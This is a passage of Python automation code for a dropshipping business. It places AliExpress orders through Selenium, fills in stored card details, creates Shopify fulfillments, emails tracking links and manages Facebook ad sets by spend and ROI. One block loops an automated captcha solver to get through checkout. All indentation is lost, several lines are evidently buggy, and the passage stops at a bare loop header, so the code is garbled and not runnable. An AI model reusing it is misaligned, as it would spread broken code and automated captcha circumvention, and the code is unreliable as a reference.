# Exec('# click the shipping option\nshipping_company = ShippingCost().get_shipping_company(x.shipping,x_shop)\n# self_.ss.ffst("td", shipping_company).click().ffs("input","value","OK").click().sp(2)\nself_.ss.jcns("service-name","click",{"text":shipping_company}).sp(2).jtns("button","click",{"ae_button_type":"detail_shipping_panel_apply"}).sp(2)\n# Set TrackMethod and Price\n# setattrs(self_.order, "ali_tracking_method", shipping_company, "ali_price", (self_.order.quantity *float( Join(".",findall(self_.ss.fcn("product-price-value").text,"\\d+"))))+(float(Join(".",findall(self_.ss.fcn("product-shipping-price").text,"\\d+")))) )\n# add shipping price later\nsetattrs(self_.order, "ali_tracking_method", shipping_company, "ali_price", (self_.order.quantity *float( Join(".",findall(self_.ss.fcn("product-price-value").text,"\\d+")))) )\nOSA.log("order price: %s\\nali_order_price: %s\\n\\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))',globals(),locals())
# click the shipping option
shipping_company = ShippingCost().get_shipping_company(x.shipping,x_shop)
# self_.ss.ffst("td", shipping_company).click().ffs("input","value","OK").click().sp(2)
self_.ss.jcns("service-name","click",{"text":shipping_company}).sp(2).jtns("button","click",{"ae_button_type":"detail_shipping_panel_apply"}).sp(2)
# Set TrackMethod and Price
# setattrs(self_.order, "ali_tracking_method", shipping_company, "ali_price", (self_.order.quantity *float( Join(".",findall(self_.ss.fcn("product-price-value").text,"\d+"))))+(float(Join(".",findall(self_.ss.fcn("product-shipping-price").text,"\d+")))) )
# add shipping price later
# Exec('to_return = False\n# add to cart action and check it\nclick_add_to_cart_action = tryprocess(lambda: self_.ss.fcn("addcart").click().sp(5))\nif click_add_to_cart_action == 0:\n (OSA.log("Could not add this product to cart. This is an error that should not happen. Exitting."))\n to_return = True',globals(),locals())
to_continue = False
# add to cart action and check it
click_add_to_cart_action = tryprocess(lambda: self_.ss.fcn("addcart").click().sp(5))
if click_add_to_cart_action == 0:
(OSA.log("Could not add this product to cart. This is an error that should not happen. Exitting."))
option = OSA.log("Do you want to manually find another one where it can add it to the cart or do you want to refund the item that can't add to cart?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
if to_continue == True: continue
if getattr(self,"manually_setted",False) == False:
self_.ss.fcns("next-dialog-close-icon").click().sp(2)
setattrs(self_.order, "ali_tracking_method", shipping_company, "ali_price", (self_.order.quantity *float( Join(".",findall(self_.ss.fcn("product-price-value").text,"\d+")))) )
else:
OSA.log("Affirming self order amounts:\nTracking:%s\nAli Price:%s" % (self_.order.ali_tracking_method,self_.order.ali_price))
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
ifdo(lambda:click_add_to_cart_action == 1,lambda:self_.fulfilled_line_items.append(self_.order))
#
self_.ss.get("https://shoppingcart.aliexpress.com/shopcart/shopcartDetail.htm").zoom_out(5)
if self_.fulfilled_line_items == []:
# if a 1 item order had all items refunded
self_()
return
self_.ss.fcn("next-checkbox-input").click().sp(7).pagestop_timeout().fid("checkout-button").click().sp(5).tp(lambda:self_.ss.frame("poplay-order").fcn("switch-to-full").click().sp(3)).sp(5)
# Exec('# Adjust Cost Based on Shipping\nshipping_cost = flt(findall(self_.ss.page_source,1,"seller-charges.*?Shipping.*?charge-cost.*?\\$(\\d+\\.\\d+)"))\nsales_tax_cost = flt(findall(self_.ss.page_source,1,"seller-charges.*?tax.*?charge-cost.*?\\$(\\d+\\.\\d+)")) if findall(self_.ss.page_source,"seller-charges.*?tax.*?charge-cost.*?\\$(\\d+\\.\\d+)") else 0\nfree_shipping_orders_count = len([i for i in self_.ss.fcns("shopping-cart-product") if i.find_elements_by_class_name("logistics-cost")[0].text == "Free Shipping"])\nadditional_shipping_cost = or_list(lambda:shipping_cost/(len(self_.orders)-free_shipping_orders_count),lambda:0)\nadditional_sales_tax_cost = or_list(lambda:sales_tax_cost/(len(self_.orders)-free_shipping_orders_count),lambda:0)\nOSA.log("The additional shipping cost: %s" % (additional_shipping_cost))\nlmap(lambda i: setattr(i,"ali_price",i.ali_price+additional_shipping_cost+additional_sales_tax_cost),self_.orders)',globals(),locals())
# Adjust Cost Based on Shipping
shipping_cost = flt(Join(".",findall(sudby(lambda i:"Shipping" in i,sud("text",self_.ss.fcns("charge-item")))[0],"\d+\.\d+")))
sales_tax_cost = flt(Join(".",findall(sudby(lambda i:"tax" in i,sud("text",self_.ss.fcns("charge-item")))[0],"\d+\.\d+"))) if sudby(lambda i:"tax" in i,sud("text",self_.ss.fcns("charge-item"))) else 0
free_shipping_orders_count = len([i for i in self_.ss.fcns("shopping-cart-product") if i.find_elements_by_class_name("logistics-cost")[0].text == "Free Shipping"])
additional_shipping_cost = or_list(lambda:shipping_cost/(len(self_.orders)-free_shipping_orders_count),lambda:0)
additional_sales_tax_cost = or_list(lambda:sales_tax_cost/(len(self_.orders)),lambda:0)
OSA.log("The additional shipping cost: %s" % (additional_shipping_cost))
lmap(lambda i: setattr(i,"ali_price",i.ali_price+additional_shipping_cost+additional_sales_tax_cost),self_.orders)
# 3/1 happened where the is_webmoney did not show up but will see if this happens for all other orders.
is_webmoney = False
# self_.ss.ffst("p","Payment Methods").click().sp(4).tp(lambda:self_.ss.jcns("pay-title","click",{"text":"Show all payment methods"}).sp(2))
self_.ss.fcns("payment-title").click().sp(4).tp(lambda:self_.ss.jcns("pay-title","click",{"text":"Show all payment methods"}).sp(2))
if "WESTUNION" in [i.text for i in self_.ss.fcns("disabled")]: is_webmoney = True
if is_webmoney == False: self_.ss.fcn("west-union").click().sp(3)
elif is_webmoney == True: self_.ss.fcn("wm-ebank").click().sp(3)
self_.ss.tp(lambda:[(i.click(),time.sleep(2)) for i in self_.ss.jcns("seller-message-title",0,{"ae_button_type":"message_for_seller"})])
self_.ss.tp(lambda: lmap(lambda i: [i.clear(), i.send_keys("Hello, I am dropshipping, please send this without price or invoice\nThank you"), sp(2)], self_.ss.ftns("textarea")))
# datas = [{"qty":i.quantity,"title":i.title,"url":Get(Product,id=i.product_id).ali_url,"variant_title":i.variant_title,"idx":idx} for idx, i in enum(unfulfilled_orders)]
datas = [{"qty":i.quantity,"title":i.title,"url":InceptedProduct().RScan(i.product_id).ali_url,"variant_title":i.variant_title,"idx":idx} for idx, i in enum(self_.orders)]
OSA.log("Check datas:\n\n%s"%(str(json.dumps(datas,indent=4))))
Exec('# Captcha Loop Until Able To Check Out\nif self_.ss.fcns("captche-input",6):\n OSA.log("Found captcha")\n while self_.ss.fcns("captche-input",6):\n self_.ss.fcn("captche-input").send_keys(handle_captcha(findall(self_.ss.page_source,1,\'(http://captcha.alibaba.com.*?)"\').replace("amp;",""))[\'text\'])\n complete_order = True\n if complete_order == True:\n ss.fid("checkout-button").click().sp(30)\n # ifdo(lambda:"shoppingcart.aliexpress.com/order/confirm_order.htm" in self_.ss.current_url, lambda:[self_.ss.ffst("p","Payment Methods").click().ffst("p","Other payment methods").click().ffst("button","Confirm").click().sp(2), lmap(lambda i: [i.clear(), i.send_keys("Hello dear, I am dropshipping, please send this without price or invoice\\nThank you"), sp(1)], self_.ss.ftns("textarea"))])\n ifdo(lambda:"shoppingcart.aliexpress.com/order/confirm_order.htm" in self_.ss.current_url, lambda:[self_.ss.ffst("p","Payment Methods").click().ffst("button","Confirm").click().sp(2), lmap(lambda i: [i.clear(), i.send_keys("Hello dear, I am dropshipping, please send this without price or invoice\\nThank you"), sp(1)], self_.ss.ftns("textarea"))])\n # input("Proceed")\nelse:\n complete_order = True\n if complete_order == True:\n self_.ss.fid("checkout-button").click().sp(30)',globals(),locals())
globals().update(locals())
self_.ss.get("https://trade.aliexpress.com/orderList.htm").fcn("msg-detail").click()
order_ids = lmap(lambda i:int(i.find_elements_by_class_name("info-body")[0].text),self_.ss.fcns("order-info"))
self_.ss.zoom_level(2).fcn("all-selector").click().fid("TP_CombinPay").click().sp(5).frame("poplay-order")
price,card_id=float(Join(".",findall(self_.ss.fcn("price-value").text,"\d+"))),findall(self_.ss.fcn('payment-title').text,"\d+")[1]
self_.ss.fcns("btn-bind").click().sp(10)
if len(self_.ss.jcns("next-message-title",0,{"text":"Payment Successful"})) == 0:
if self_.ss.fcns("card-number-input"):
self_.ss.fid("cardNum").send_keys(Shop()(x_shop).AliExpress_Financial_Card_Information["Financial_Card_Number"])
self_.ss.sp(10)
self_.ss.ffst("button","Confirm").click()
self_.ss.sp(30)
elif self_.ss.ftns("iframe") and self_.ss.fids("expires"):
self_.ss.fid("expires").send_keys(Shop()(x_shop).AliExpress_Financial_Card_Information["Financial_Card_Expiration_Date"])
self_.ss.sp(10)
self_.ss.fcns("next-btn-primary").click()
self_.ss.sp(30)
ifdo(lambda:len(order_ids)!=1,lambda:OSA.log("The number of order numbers is %s, not 1."%(len(order_ids)),tp=False))
lmap(lambda i:Update(i,saved_address_screenshot=open(shipping_address_,"rb").read()),self_.orders)
PaidCardNumber(order_ids=order_ids,price=price,card_id=card_id,paid_at = Date().Now() ).save()
lmap(lambda i: [Update(i,ali_order_number=order_ids[0],fulfillment_status="fulfilled",t2=Date().myDatetimenow()),Update(i,e1=i.t2-i.t1)], self_.orders)
lmap(lambda i: exec("assert Get(Lineitem,id=self_.order.id).fulfillment_status == 'fulfilled'"), self_.orders)
real_order_shopify_side = self_.shop.ofind(id_=self_.real_order.id)
line_items = keyby(lambda i:i.id in sud("id", self_.fulfilled_line_items), real_order_shopify_side.line_items)
lmap(lambda i:xir(i,fulfillment_status="fulfilled"),line_items)
line_items = lmap(lambda i:i.to_dict(), line_items)
lmap(lambda i: delete_keys(i,"admin_graphql_api_id","discount_allocations","origin_location","price_set","total_discount_set"), line_items)
data = dict(line_items=line_items,order_id=self_.real_order.id,notify_customer=True,service="manual",location_id=self_.shop.location_id)
print("\n===fulfillment_data\n%s"%json.dumps(data, indent=4))
new_fulfillment = self_.shop.shopify.Fulfillment(data)
ifdo(lambda: new_fulfillment.save() != True,lambda:OSA.log("Fulfillment did not save."))
ordersFeed(self_.real_order.shop,7)
self_.real_order = Get(Order,id=self_.real_order.id)
self_.saved_data_2 = [{"shipping_address":address_string_from_dict(self_.real_order.shipping_address),"idx":idx,"total quantity":i["quantity"],"title":i["title"],"variant_title":i["variant_title"],"fulfilled quantity":i["quantity"] if i["fulfillment_status"] == "fulfilled" else 0, "ali_url":InceptedProduct().RScan(Get(Lineitem,id=i["id"]).product_id).ali_url,"sku":i["sku"]} for idx,i in enum(self_.real_order.line_items)]
OSA.log(df=Join("\n",[compare_dict(a,b) for a,b in zip(self_.saved_data_1,self_.saved_data_2)]))
self_()
class Orders(object):
def __init__(self):
shop = Shop()(init_shop=shop)
self.ordersCreate()
self.ordersTrack()
self.similarimagesCreate()
self.ordersEmail()
def transmit(self):
ordersSheet.postSelf(Order.Objects())
def ordersCreate(self):
pass
def ordersTrack(self):
pass
def ordersEmail(self):
pass
def similarimagesCreate(self):
pass
class ordersEmail(object):
def __init__(self, shop):
self.e = Emailer(shop.Business_Email_Address)
def formulate_email(self, shop, order_no, contact_name, to_email, tracking_number_list):
print("Sending Email")
subject = 'Your %s Tracking Number for Order # %s' % (shop.Business_Name, order_no)
to = to_email
msgHtml = "<br>Dear %s,<br /><br>Thank you for your purchase at %s! <br /> <br> Attached is the tracking number for Order #%s: "% (contact_name.title(), shop.Business_Name, order_no)
msgHtml += "<br>Shipping is via USPS and may be tracked as follows: <br />"
tracking_link = "<br>Link: https://www.17track.net/en/track?nums="
for tn in tracking_number_list:
tracking_link += '%s,'%tn
tracking_link += "<br /><br><br />"
for i in tracking_number_list:
tracking_link += "<br>%s<br />" % i
msgHtml += tracking_link
msgHtml += "<br>Please do not hesitate to reply back to this email if you have any questions.<br />"
msgHtml += "<br><br /><br> - Lilith from %s<br />" % shop.Business_Name
print(msgHtml)
return_status = self.e.send_message(subject,to,msgHtml)
print("sleeping 5 seconds to assure no rate limiting.. ")
time.sleep(5)
globals()['return_status'] = return_status
if 'HttpError' in return_status:
print('HttpError ', return_status, "Sleeping 10 Minutes")
time.sleep(600)
def create_new_fulfillment(line_item,shopify_order,tracking_company_dict):
OSA.log("Creating new tracking number fulfillment: %s, %s" % (line_item.ali_tracking_number, tracking_company_dict))
Update(line_item,ali_tracking_number = line_item.ali_tracking_number.strip())
fulfillment = None
for i in shopify_order.fulfillments:
for j in i.line_items:
if j.id == line_item.id:
fulfillment = i
fulfillment.tracking_numbers.append(str(line_item.ali_tracking_number.strip()))
fulfillment.tracking_urls.extend(["https://tools.usps.com/go/TrackConfirmAction?tLabels={}".format(line_item.ali_tracking_number.strip()),"https://t.17track.net/en#nums={}".format(line_item.ali_tracking_number.strip())])
fulfillment.tracking_company = tracking_company_dict.get(line_item.ali_tracking_method, "USPS")
try:
Fulfillments_Created().add(order_id=shopify_order.id,lineitem_id=line_item.id,tracking_company_dict=fulfillment.to_dict())
OSA().log("Fulfillments_Created saved")
except Exception as e:
print(e)
OSA().log("Fulfillment could not create. Not saving the fulfillment.")
(0/0)
redprint("saved fulfillment: %s" % fulfillment.save())
redprint("An email will be sent out. ")
class Aliexpress_Core(object):
def __init__(self,window_index=[0,0,3.5,3.5],ph=True,exit_browser=True):
setattrs(self,"username",a_shop().AliExpress_Email,"password",a_shop().AliExpress_Password,)
self.rq = Aliexpress_Requests()()
class Aliexpress_Login:
def __init__(self,window_index=[0,0,3.5,3.5],ph=False,exit_browser=True):
setattrs(self,"ph",ph,"exit_browser",exit_browser,"window_index",window_index,"headers",session_headers,"username",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Email,"password",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Password,)
globalise(Browser()( ("sele") ).get("https://login.aliexpress.com/").sp(5).tp(lambda:globe("ss_v").frame("alibaba-login-box")).bat().fid("fm-login-id").fid("fm-login-password").fcn("password-login").bat(self.username,self.password,globe("ss_v").SHADOW.ENTER).sp(10).tp(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=globe("ss_v").get_cookies(),reverse=False)).tp(lambda:setattr(self,"rq",cookies_to_session(cookies_to_database(self.username,"AliExpress"),requests.Session()))).tp(lambda:globe("ss_v").quit()if(self.exit_browser)else()),"ss")
class Tracker_Updates:
def run(self,shop):
for i in onyx_lineitems("e1"):
i.update_tracker_data() # events = self.get_tracking_events()
for i in onyx_lineitems("e2"):
if i.ali_order_number:
i.update_tracker_data()
for i in onyx_lineitems("e3"):
if i.ali_order_number:
i.update_tracker_data()
class InventoryLevel:
def adjust(self, shop, variant, available_adjustment):
original = (variant.inventory_quantity if(dict!=type(variant))else(variant["inventory_quantity"]))
calls = ((Shop()(shop) if(str==type(shop))else(shop)).shopify.InventoryLevel.adjust(location_id=(Shop()(shop) if(str==type(shop))else(shop)).location_id, inventory_item_id = (variant.inventory_item_id if(dict!=type(variant))else(variant["inventory_item_id"])),available_adjustment = available_adjustment))
while True:
ensurement = ((Shop()(shop) if(str==type(shop))else(shop)).shopify.Variant.find(id_=(variant.id if(dict!=type(variant))else(variant["id"])))).inventory_quantity
# here, use another call of the variant's inventory_quantity and compare it to the first; ensuring the original has increased or decreased by a quantity over the ladder.
changed_amount = available_adjustment
twine = (changed_amount) == ( ( ensurement.__sub__ ( original ) ))
redprint( "changed_amount:%s\nensurement-original:%s"%((changed_amount), ( ( ensurement.__sub__ ( original ) ))))
if twine == True:
break
else:
redprint("||Waiting for updated inventory amount..")
time.sleep(0.5)
redprint("--end")
assert (changed_amount) == ( ( ensurement.__sub__ ( original ) ))
time.sleep(0.25)
return calls
""" Business-Utils-Ad-Utils """
def Ads(shop):
active_ads = adsFeed(shop, date_range=100, bd=True, filters='active')
paused_ads = adsFeed(shop, date_range=7, bd=True, filters='paused')
_ads_utils_daily_stop(adsets = active_ads)
_ads_utils_daily_restart(adsets = paused_ads)
try: shop.ff.quit()
except: pass
def Ads_Duplicate(shop):
"""
Download All Ad Sets
Get All Campaigns via API
For each Campaign:
Get All Ads
Targeting_Spec_Dict keying Ads Targeting_Specs
For Each Targeting_Spec:
Create a current_budget_list
Discover count new_budgets
Duplicate the $5 ad set Accordingly to the count_new_budgets & current_budget_list
"""
count_of_newly_created_adsets = 0
sum_of_newly_created_adsets_budget = 0
#Download All Ad Sets
csv_adsets = None
if datetime.now().hour in [0,1,2]:
csv_adsets = adsFeed(shop, date_range=1, bd=True, filters=None)
else:
csv_adsets = adsFeed(shop, date_range=0, bd=True, filters=None)
errors=0
#Create a Group of Active Campaign IDs
campaigns = shop.fb.get_campaigns(params={'limit':9000})
for campaign in campaigns:
major_dict = {}
adsets = campaign.get_ad_sets()
for adset in adsets:
targeting_spec = '%s' % adset.remote_read(fields=['targeting', 'daily_budget'])['targeting']._json
print('targeting spec:\n%s\n\n\n'%targeting_spec)
if targeting_spec not in major_dict.keys():
major_dict[targeting_spec] = []
major_dict[targeting_spec].append(adset)
elif targeting_spec in major_dict.keys():
major_dict[targeting_spec].append(adset)
targeting_spec_count = len(major_dict.keys())
print("targeting spec count: %s" % targeting_spec_count)
for targeting_spec, adsets in major_dict.items():
current_budget_list = sorted(list(map(int, key('daily_budget', adsets))), reverse=False)
print("current budget list: %s" % current_budget_list)
original_adset = None
roi_list = []
for adset in adsets:
if adset['daily_budget'] == "500":
original_adset = adset
for csv_adset in csv_adsets:
if csv_adset['Ad Set ID'] == adset['id']:
roi_list.append(csv_adset['roi'])
print("original_adset: %s" % original_adset['id'])
print("roi_list: %s, count: %s" % (roi_list, len(roi_list)))
count_of_good_rois = len([i for i in roi_list if i > 2])
print("count of good rois: %s" % count_of_good_rois)
new_budgets = list(range(max(current_budget_list) + 500, 40000, 500))[:count_of_good_rois]
print("new rois: %s" % new_budgets)
for new_budget in new_budgets:
try:
new_adset, new_ad = Copy(shop, original_adset['id'])
print("making a copy")
new_adset['daily_budget'] = new_budget
new_adset.remote_read(fields=['name', 'start_time', 'effective_status', ])
new_adset.remote_update()
print('new adset: %s\n' % new_adset)
time.sleep(12)
count_of_newly_created_adsets += 1
sum_of_newly_created_adsets_budget += new_budget
except:
errors+=1
print("error with duplication count is: %s"%errors)
print('\n\n\n\n\n')
print("sum of current_budget_today: %s" % (sum(list(map(int, key(csv_adsets, 'Budget'))))))
print("sum of current_budget_today spent so far: %s" % (sum(list(map(float, key(csv_adsets, 'Amount Spent (USD)'))))))
print("sum of purchases value today so far: %s" % (sum(list(map(float, key(csv_adsets, 'Website Purchases Conversion Value'))))))
print("sum of purchases value target today: %s" % (sum(list(map(int, key(csv_adsets, 'Budget')))) * 2))
print("count of newly created adsets: %s" % count_of_newly_created_adsets)
print("sum of newly created adsets budgets: %s" % sum_of_newly_created_adsets_budget)
print('\n\n\n\n\n')
print('-'*20)
def _ads_utils_daily_restart(adsets):
# ads_utils_restart_if_sale_in_last_20_spent
# get_adm_url_by_ids(shop, id_list=restart_ids, date_range=180)
# Directions: Just get_adm_url, and hit 'turn on'
# delivery, inactive, go to ads, set bd-> daily, sort adname
# ads_util_restart_adsets(id_list=restart_ids)
if len(adsets) == 0:
return
adset_ids = key(adsets, key='Ad Set ID')
# dict with key as adset_id
data = dict(zip(adset_ids, [[] for i in range(len(adset_ids))]))
# dict with values as all days with that adset_id
for i in adsets:
i['date'] = Date(i['Reporting Starts']).dateobj
for a in data:
for i in adsets:
if i['Ad Set ID'] == a:
data[a].append(i)
# sort adsets based on date ordered past to future
# sets spent, purchases, num_consec_bad to 0,0,0
# for each adset_id, for each day in the value list, adds the spent, purchases.
# if spent >20, purchases == 0, no matter the day, it is a bad consecutive adset.
# if it is bad, sets spent, purchases, to 0,0 to restart count & not overlap
# assigns num_consec_bad to adset's dict.
for a in data:
data[a] = keysort('date', data[a], tcer=False)
for k,v in data.items():
spent = 0
purchases = 0
num_consec_bad = 0
for adset in v:
spent += float(adset['Amount Spent (USD)'])
purchases += float(adset['Website Purchases'])
#print(spent, purchases)
if spent > 20 and purchases == 0:
num_consec_bad += 1
purchases = 0
spent = 0
adset['num_consec_bad'] = num_consec_bad
print('Ad Set ID: %s | num_consec_bad: %s' % (adset['Ad Set ID'], adset['num_consec_bad']))
# sorts adsets ordered now to backthen
# if num_consec_bad is > 3, do not restart
# otherwise, counts from date now to backthen, if has purchase in last 20 spent, add to restart_id list.
for a in data:
data[a] = keysort('date', data[a], tcer=True)
restart_ids = []
for k,v in data.items():
day = 0
spent = 0
purchases = 0
for adset in v:
day += 1
spent += float(adset['Amount Spent (USD)'])
purchases += float(adset['Website Purchases'])
print("date: %s, spent: %s, pcs: %s" % (adset['date'], adset['Amount Spent (USD)'], adset['Website Purchases']))
if day <= 4 and spent <= 20 and purchases > 0:
if adset['num_consec_bad'] <= 2:
print("will be restarted... ")
restart_ids.append(int(adset['Ad Set ID'].replace('c:','')))
print("\n\n\n")
restart_ids = list(set(restart_ids))
for _id in restart_ids:
print("RESTART_IDS: %s"%_id)
#get_adm_url_by_ids(shop, restart_ids, action='restart')
_ads_utils_restart_adsets(list(set(restart_ids)))
def _ads_utils_daily_stop(adsets):
if len(adsets) == 0:
return
print(""" If you want to check against it, generate list of pause_ids,
filter-> delivery: active,&go to ads,& set bd->daily,& sort adname.""")
for i in adsets:
i['id_'] = i['Ad Set ID'].replace('c:','')
i['date'] = Date(i['Reporting Starts']).dateobj
pause_ids = []
adset_ids = list(set(key(adsets, key='id_')))
for id in adset_ids:
sorted_ads = keysort('date', keyequals('id_', id, adsets), tcer=True)
spent = 0
pcs = 0
print('id: %s' % id)
for adset in sorted_ads:
spent += float(adset['Amount Spent (USD)'])
pcs += float(adset['Website Purchases'])
print("date: %s, spent: %s, pcs: %s" % (adset['date'], adset['spent'], adset['pcs']))
if (spent >= 20 and pcs == 0):
print("spend over 20: %s" % (spent - 20))
pause_id = adset['id_']
if pause_id not in pause_ids:
pause_ids.append(pause_id)
print("will be paused.")
print('\n\n')
time.sleep(8)
_ads_utils_pause_adsets(pause_ids)
#get_adm_url_by_ids(shop, pause_ids, action='pause')
_ads_utils_pause_adsets(list(set(pause_ids)))
def _ads_utils_pause_adsets(id_list):
id_list = list(set(id_list))
for adset_id in list(set(id_list)):
adset = AdSet(adset_id)
adset['status'] = 'PAUSED'
status_check = adset.remote_update()
print("adset %s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'PAUSED'
ad = adset.get_ads()[0]
ad['status'] = "PAUSED"
status_check = ad.remote_update()
assert status_check['status'] == 'PAUSED'
print("ad %s: %s √" % (ad['id'], status_check))
print('\n\n')
time.sleep(10)
# tested and works
def _ads_utils_restart_adsets(id_list):
for adset_id in id_list:
adset = AdSet(adset_id)
adset['status'] = 'ACTIVE'
status_check = adset.remote_update()
print("%s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'ACTIVE'
ad = adset.get_ads()[0]
ad["status"] = "ACTIVE"
status_check = ad.remote_update()
assert status_check['status'] == "ACTIVE"
print("ad %s: %s √" % (ad['id'], status_check))
print('\n\n')
time.sleep(10)
# tested and works
def _create_custom(handle, shop):
print("...Creating Custom...")
audience = CustomAudience(parent_id='act_%s' %shop.Facebook_Business_Ad_Account_ID); zz(12)
print("Creating %s for handle: %s"%(audience, handle))
params={'pixel_id': shop.Facebook_Pixel_ID,'subtype':'WEBSITE','retention_days':'180',
'rule':{"url":{"i_contains": handle}}, 'name':handle,}
custom = audience.remote_create(params=params)['id']
print("Successfully Created Custom Audience... \n%s"%custom)
return custom
def adjust_ad_columns():
pyperclip.copy('x = document.getElementsByTagName("div")\ny = []\nz = x.length\nfor (i=0;i<z;i++) {a=x[i]; if (a.getAttribute("data-testid")=="FixedDataTableRow") {y=y.concat(a);}}\nb = y.length\nfor (i=0;i<b;i++) {\n a = y[i];\n c = a.getElementsByClassName("_4h2m");\n console.log(c.length);\n d = c[0]; d.style.width = "40px"; d.style.left = "0px";\n d = c[1]; d.style.width = "40px"; d.style.left = "40px";\n d = c[2]; d.style.width = "160px"; d.style.left = "80px";\n d = c[3]; d.style.width = "100px"; d.style.left = "0px";\n d = c[4]; d.style.width = "100px"; d.style.left = "100px";\n d = c[5]; d.style.width = "100px"; d.style.left = "200px";\n d = c[6]; d.style.width = "100px"; d.style.left = "300px";\n d = c[7]; d.style.width = "100px"; d.style.left = "400px";\n d = c[8]; d.style.width = "100px"; d.style.left = "500px";\n d = c[9]; d.style.width = "100px"; d.style.left = "600px";\n d = c[10]; d.style.width = "100px"; d.style.left = "700px";\n d = c[11]; d.style.width = "100px"; d.style.left = "800px";\n d = c[12]; d.style.width = "100px"; d.style.left = "900px";\n d = c[13]; d.style.width = "100px"; d.style.left = "1000px";\n d = c[14]; d.style.width = "100px"; d.style.left = "1100px";\n d = c[15]; d.style.width = "100px"; d.style.left = "1200px";\n d = c[16]; d.style.width = "100px"; d.style.left = "1300px";\n d = c[17]; d.style.width = "100px"; d.style.left = "1400px";\n e = a.getElementsByClassName("_3pzk");\n f = e[1]; f.style.width = "241px"; f.style.left = "241px";\n}\nx = document.getElementsByClassName("_1mic")[0];\ny = x.getElementsByClassName("_4h2m");\nz = y[0]; z.style.width = "40px"; z.style.left = "0px";\nz = y[1]; z.style.width = "40px"; z.style.left = "40px";\nz = y[2]; z.style.width = "160px"; z.style.left = "80px";\nz = y[3]; z.style.width = "100px"; z.style.left = "0px";\nz = y[4]; z.style.width = "100px"; z.style.left = "100px";\nz = y[5]; z.style.width = "100px"; z.style.left = "200px";\nz = y[6]; z.style.width = "100px"; z.style.left = "300px";\nz = y[7]; z.style.width = "100px"; z.style.left = "400px";\nz = y[8]; z.style.width = "100px"; z.style.left = "500px";\nz = y[9]; z.style.width = "100px"; z.style.left = "600px";\nz = y[10]; z.style.width = "100px"; z.style.left = "700px";\nz = y[11]; z.style.width = "100px"; z.style.left = "800px";\nz = y[12]; z.style.width = "100px"; z.style.left = "900px";\nz = y[13]; z.style.width = "100px"; z.style.left = "1000px";\nz = y[14]; z.style.width = "100px"; z.style.left = "1100px";\nz = y[15]; z.style.width = "100px"; z.style.left = "1200px";\nz = y[16]; z.style.width = "100px"; z.style.left = "1300px";\nz = y[17]; z.style.width = "100px"; z.style.left = "1400px";\ne = x.getElementsByClassName("_3pzk");\nf = e[1]; f.style.width = "241px"; f.style.left = "241px";\n\nx = document.getElementsByClassName("_1mme")[0];\ny = x.getElementsByClassName("_1eyi");\nz = y[0]; z.style.width = "40px"; z.style.left = "0px";\nz = y[1]; z.style.width = "40px"; z.style.left = "40px";\nz = y[2]; z.style.width = "160px"; z.style.left = "80px";\nz = y[3]; z.style.width = "100px"; z.style.left = "0px";\nz = y[4]; z.style.width = "100px"; z.style.left = "100px";\nz = y[5]; z.style.width = "100px"; z.style.left = "200px";\nz = y[6]; z.style.width = "100px"; z.style.left = "300px";\nz = y[7]; z.style.width = "100px"; z.style.left = "400px";\nz = y[8]; z.style.width = "100px"; z.style.left = "500px";\nz = y[9]; z.style.width = "100px"; z.style.left = "600px";\nz = y[10]; z.style.width = "100px"; z.style.left = "700px";\nz = y[11]; z.style.width = "100px"; z.style.left = "800px";\nz = y[12]; z.style.width = "100px"; z.style.left = "900px";\nz = y[13]; z.style.width = "100px"; z.style.left = "1000px";\nz = y[14]; z.style.width = "100px"; z.style.left = "1100px";\nz = y[15]; z.style.width = "100px"; z.style.left = "1200px";\nz = y[16]; z.style.width = "100px"; z.style.left = "1300px";\nz = y[17]; z.style.width = "100px"; z.style.left = "1400px";\ne = x.getElementsByClassName("_182x");\nf = e[1]; f.style.left = "241px";\n\n\nx = document.getElementsByClassName("_1mme")[0];\ny = x.getElementsByClassName("_4h2m");\nz = y[0]; z.style.width = "40px";\nz = y[1]; z.style.width = "40px";\nz = y[2]; z.style.width = "160px";\nz = y[3]; z.style.width = "100px";\nz = y[4]; z.style.width = "100px";\nz = y[5]; z.style.width = "100px";\nz = y[6]; z.style.width = "100px";\nz = y[7]; z.style.width = "100px";\nz = y[8]; z.style.width = "100px";\nz = y[9]; z.style.width = "100px";\nz = y[10]; z.style.width = "100px";\nz = y[11]; z.style.width = "100px";\nz = y[12]; z.style.width = "100px";\nz = y[13]; z.style.width = "100px";\nz = y[14]; z.style.width = "100px";\nz = y[15]; z.style.width = "100px";\nz = y[16]; z.style.width = "100px"; z.style.left = "1300px";\nz = y[17]; z.style.width = "100px"; z.style.left = "1400px";\ne = x.getElementsByClassName("_3pzk");\nf = e[1]; f.style.width = "241px"; f.style.left = "241px";\n')
while True:
